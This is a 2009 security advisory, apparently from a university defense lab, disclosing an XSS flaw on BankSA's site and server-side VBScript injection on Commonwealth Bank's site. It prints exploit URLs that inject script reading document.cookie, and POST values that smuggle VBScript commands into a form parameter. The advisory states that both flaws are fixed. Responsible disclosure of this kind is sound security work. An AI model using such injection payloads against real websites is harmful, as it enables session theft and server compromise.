============================================== Security Advisory: Banks in Australia militan (Chia-Jun Lin) militan.c7@xxxxxxxxx adl.csie.ncu.edu.tw/~militan militan-c7.blogspot.com Advanced Defense Lab(ADL), NCU CSIE TAIWAN 7th May, 2009 ============================================== I. VULNERABILITY ------------------------- XSS Command Injection Banks below are vulnerable: BankSA. www.banksa.com.au Commonwealth Bank. www.commbank.com.au etc... II. DESCRIPTION ------------------------- Some banks contain vulnerabilities in certain pages, which may be misused by attackers. Via the command injection, attackers can execute any vbscript command on the hosts. Generally, the security mechanism of the websites of banks in AU are implemented indeed, However, their complex architectures are unnecessary actually. Due to the large architectures, some pages do not perform the validation properly. III. Detail & POC ------------------------ 1. BankSA: XSS. Javascript Injection. webapps.banksa.com.au/bbo_help/?helpid=login_out&origin=CBS The BBO function means "Business banking online", and the vulnerable variable is "origin". If origin=CBS, the page will immediately redirect to the link below. www.banksa.com.au/business/business-banking-online/user-guide/?source=applet&origin=CBS Nevertheless, if origin=CBS" then the page would redirect inappropriately. ****javascript code generated in the intermediate page function focusWin() { window.focus(); //var theUrl = window.location.pathname; //var pos = theUrl.indexOf("help.asp"); //theUrl = theUrl.substr(0,pos); window.location.href = "http://www.banksa.com.au/business/business-banking-online/user-guide/?source=applet&origin=CBS""; //document.write("http://www.banksa.com.au/business/business-banking-online/user-guide/?source=applet&origin=CBS""); } window.onload = focusWin; **** Exploit: webapps.banksa.com.au/bbo_help/?helpid=login_out&origin=CBS";%0a%0aalert(document.cookie);// webapps.banksa.com.au/bbo_help/?helpid=login_out&origin=CBS";}</script>%0a%0a<script>alert("Vulnerable")</script> POC: http://adl.csie.ncu.edu.tw/~militan/banksa1.jpg http://adl.csie.ncu.edu.tw/~militan/banksa2.jpg http://adl.csie.ncu.edu.tw/~militan/banksa3.jpg 2. Commonwealth Bank: ASP command injection (server-side vbscript injection) The commbank provides lots of tools to calculate, or to evaluate the financial plan. This page would collect personal information and make an appointment, and almost all the parameters are manipulated in vbscript on server. www.commbank.com.au/retirement/_PRODUCTION/content/ffthinkabout.asp Moreover, the page will return the error message when you mangle the parameters. Thus attackers can craft the exploit easily, then arbitrary vbscript commands can be executed on server. Exploit: post parameter: Whattodo (default: FillForm) FillForm & Response.write("ccccc")' FillForm & Response.write("ccccc") %0d%0a Response.write("kerker") ' POC: http://adl.csie.ncu.edu.tw/~militan/commbank1.jpg http://adl.csie.ncu.edu.tw/~militan/commbank2.jpg http://adl.csie.ncu.edu.tw/~militan/commbank4.jpg IV. SOLUTION& CONCLUSION ------------------------- Most banks in AU should reduce the enormous architecture of their website: do not provide additional functions or make sure that these functions are secure. The vulnerabilities have been fixed already. regards -- militan Advanced Defense Lab, NCU Taiwan